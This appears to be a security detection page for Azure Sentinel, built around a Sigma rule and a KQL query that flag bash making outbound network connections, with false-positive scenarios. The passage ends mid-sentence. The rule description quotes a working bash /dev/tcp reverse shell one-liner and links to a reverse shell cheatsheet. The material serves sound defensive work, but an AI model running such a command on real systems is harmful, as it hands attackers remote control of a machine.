The Linux Reverse Shell Indicator detects adversaries establishing a reverse shell connection to a remote server, which is a common technique used to maintain command and control over a compromised system. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify and mitigate potential persistent access and exfiltration activities early.
Detection Rule
title: Linux Reverse Shell Indicator
id: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871
status: test
description: Detects a bash connecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
references:
  - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
author: Florian Roth (Nextron Systems)
date: 2021-10-16
modified: 2022-12-25
tags:
  - attack.execution
  - attack.t1059.004
logsource:
  product: linux
  category: network_connection
detection:
  selection:
    Image|endswith: '/bin/bash'
  filter:
    DestinationIp:
      - '127.0.0.1'
      - '0.0.0.0'
  condition: selection and not filter
falsepositives:
  - Unknown
level: critical
imNetworkSession
| where (SrcProcessName endswith "/bin/bash" or DstProcessName endswith "/bin/bash") and (not((DstIpAddr in~ ("127.0.0.1", "0.0.0.0"))))
Scenario: Scheduled Job Using bash for Log Rotation or System Maintenance
Description: A legitimate system maintenance script or log rotation job uses bash to execute commands that involve redirection to a local file, which might resemble a reverse shell pattern.
Filter/Exclusion: Exclude processes associated with known log rotation tools like logrotate or system maintenance scripts located in /etc/cron.d/ or /etc/cron.hourly/.
Scenario: Admin Using bash with Redirection for Debugging or Output Capture
Description: A system administrator might use bash with redirection (e.g., bash -c "some command" > /tmp/output.log 2>&1) to capture output for debugging or auditing purposes.
Filter/Exclusion: Exclude processes where the command line includes redirection to files in standard log directories like /var/log/, /tmp/, or /dev/null.
Scenario: Using bash with nc (Netcat) for Internal Communication
Description: A legitimate internal tool like nc (Netcat) might be used to establish a reverse shell between internal systems for troubleshooting or remote administration.
Filter/Exclusion: Exclude processes where the command includes nc or netcat and the destination IP is within the internal network range (e.g., 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16).
Scenario: Using bash with socat for Secure Tunneling or Port Forwarding
Description: A security tool like socat might be used to create tunnels or forward ports, which could involve bash in the command chain.
Filter/Exclusion: Exclude processes where